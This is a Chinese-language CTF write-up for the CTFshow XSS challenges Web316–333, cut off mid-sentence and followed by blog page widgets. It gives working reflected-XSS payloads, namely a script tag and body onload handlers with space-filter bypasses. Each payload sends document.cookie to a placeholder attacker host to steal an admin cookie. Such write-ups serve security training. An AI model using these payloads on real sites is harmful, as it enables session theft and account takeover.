[WP/CTFshow]XSS Web316-333

本文详细介绍了反射型XSS漏洞的利用方式,包括通过JavaScript注入、事件触发、字符绕过等手段,展示了如何构造XSS脚本来窃取或操纵Cookies。同时,还探讨了针对管理员Cookie的获取策略,如利用Burp Suite抓包分析和异步数据获取。此外,提到了密码修改和金额转账的潜在攻击场景,并提醒了HTTP GET请求的参数长度限制和DoS风险。

CTFSHOW WP

题目的原理就是靶机的bot每隔一段时间访问输入的内容,模拟了反射型XSS

316.需要配套接收端XSS脚本

如果未过滤script且对外部资源加载无限制的情况下,可以指定src为精心准备的JS文件,使其加载,产生携带COOKIE的请求。

本解法直接将产生请求写在了表层。

<script>document.location.href='http://xxxxxxxxxxxxxxxxxxxx/x.php?1='+document.cookie</script>
317、318、319
<body onload="document.location.href='http://xxxxxxxxxxxxxxxxx/x.php?1='+document.cookie"></body>
320、321、322、323、324、325、326

空格过滤

可用tab,/**/等绕过

实测iframe,script,blog被过滤

<body/**/οnlοad="document.location.href='http://xxxxxxxxxxxx/x.php?1='+document.cookie"></body>
<body/οnlοad="document.location.href='http://xxxxxxxxxxxxx/x.php?1='+document.cookie"></body>
327

收件人admin

328、329、330

329会在访问后注销COOKIE

思路一

<script>document.location.href='http://xxxxxxxxxxxxxxxxxxx/x2.php?1='+document.cookie;</script>

XSS获取到管理员COOKIE,PHP令牌

1.在存储中修改COOKIE(),直接读取数据(前

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值